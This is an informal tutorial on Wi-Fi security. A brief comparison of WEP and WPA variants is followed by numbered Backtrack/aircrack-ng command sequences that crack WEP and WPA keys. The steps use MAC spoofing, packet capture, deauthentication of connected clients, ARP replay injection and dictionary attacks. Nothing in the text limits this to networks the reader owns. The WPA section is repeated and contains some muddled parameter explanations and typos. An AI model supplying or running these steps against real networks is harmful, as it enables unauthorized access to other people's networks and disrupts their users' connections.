Wireless Security

Types of Security

WEP
WEP (Wired Equivalent Privacy) is an old encryption type. It's used extensively in
wireless networking even though it's quite easy to hack into. It is the default
encryption on many wireless routers and as a result it is currently the most
commonly used. Use this if you are not too worried about a geek hacking in and
stealing your internet connection. The chances are small. Otherwise go for
something better.

WPA
WPA (Wi-Fi Protected Access) addresses the shortcomings of WEP and is much far
more difficult to hack. WPA came out around 2002. The geek next door may take 10
minutes to hack your WEP, but may take a day or two to hack WPA. WPA was the
interim format while WPA2 is the final, more secure, version.

WPA-TKIP
Security type WPA and the encryption type TKIP. TKIP (Temporary Key Integrity
Protocol) is used within WPA above. This solution is very hard to hack but there is a
flaw in the encryption, which presents a slight vulnerability. The great thing about
TKIP is it is compatible with older hardware (pre 2003 wireless network cards).

WPA-AES
Advanced Encryption Standard, AES is not compatible with pre 2003 hardware but is
almost impossible to hack if a good key/passphrase is chosen. The US government
as their standard encryption has adopted AES. It is the used in the final version of
WPA (WPA2).
WPA-PSK
PSK stands for Pre Shared Key. All of the above use PSK (Pre Shared Key). Which
just means you have chosen a passphrase or key that will be known by the router
and the computer to connect each other?
WEP Security

Step 1:

Download Backtrack (Latest Version Recommended) from the following link

http://www.backtrack-linux.org/downloads/

Step 2:

Burn the iso image on DVD and boot your laptop from DVD drive

Step 3:

Select the third boot option i.e. BOOT FROM CD or USB

Step 4:

Once you are in Back Track, click the tiny black box in the lower left corner to load
up a "Konsole" window.

Step 5:

Type the following command

airmon-ng

It will show you the interfaces available in your system.

Step 6:

airmon-ng stop wifi0

To Stop the Monitor Mode.

Step 7:

ifconfig wifi0 down

To Detach the IP Address from the Interface.

Step 8:

To Change the MAC Address (Yes, It can be spoofed !!!)

macchanger --mac 00:11:22:33:44:55 wifi0

To Enable Monitor Mode

airmon-ng start wifi0

Step 10:

To see available access points

airodump-ng wifi0

This will start populating Wifi networks. Press Ctrl + C to stop.

Check the network with WEP encryption.

Notedown BSSID, CH and ESSID somewhere in notepad or paper

To Start Monitoring of a particular Wireless Access Point

airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0

Replace

(channel) with the CH which u had already note

(file name) with any name of your choice

(bssid) with the BSSID which u had already note

Leave this console as it is and start new console

Step 12:

To Deauthenticate and Authenticate our self.

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wifi0

Step 13:

To Attack on the Access Point.

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wifi0

Well if you don’t see ARP ACK and sent packets are not increasing or still 0 than it
means no 1 is accessing that network.But don’t worry you got an optional step

Leave this console as it is and start new console

To choose the packets to get the key

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b (bssid) –h 00:11:22:33:44:55 wfi0

aircrack-ng -b (bssid) (filename)-01.cap

Just wait and watch…..Backtrack will do rest of the work.

Hurray we got the key. Remove “:” so as in our screenshot the key will be
7D0005F98DC9E489F211C54998
WPA Security

Step: 1

airmon-ng

To get the list of the available access points.

Step: 2

airmon-ng stop wlan0

To disable the monitor mode.

Step: 3

macchanger –-mac <New Mac, i.e. 00:11:22:33:44:55> wlan0

To change your mac, Yes, It can be changed!!! Once again! 

Step: 4

airmon-ng start wlan0

To put the interface in the monitor mode.

airodump-ng wlan0

To see the available access points.

Step: 6

airodump-ng –c<channel num> -w <Create file and write into it> --bssid
<router/access point mac> wlan0

To set the channel num, bssid and where to save the captured data.

Step: 7

aireplay-ng -0 5 –c <client which is connected to the router> -a <access point> wlan0

0 = is to deauthenticate the user.

5 = for dictionary attack.

It will deauthenticate the user and quickly authenticate him once again, but mean
while we will also be authenticated… FAKE AUTHENTICATION!! 

Step: 8

aircrack-ng <captured data filename which we created> -w <dictionary file path>

Step: 1

airmon-ng

To get the list of the available access points.

Step: 2

airmon-ng stop wlan0

To disable the monitor mode.

Step: 3

macchanger –-mac <New Mac, i.e. 00:11:22:33:44:55> wlan0

To change your mac, Yes, It can be changed!!! Once again! 

Step: 4

airmon-ng start wlan0

To put the interface in the monitor mode.

airodump-ng wlan0

To see the available access points.

Step: 6

airodump-ng –c<channel num> -w <Create file and write into it> --output-format ivs
mon0

To set the channel num, essid and where to save the captured data.

Step: 7

aireplay-ng -0 1 –c <ESSID of Router> mon0

0 = is to deauthenticate the user.

1 = for the Fake Authentication.

It will deauthenticate the user and quickly authenticate him once again, but mean
while we will also be authenticated… FAKE AUTHENTICATION!! 

Step: 8

aircrack-ng -w <dictionary file path> filename.ivs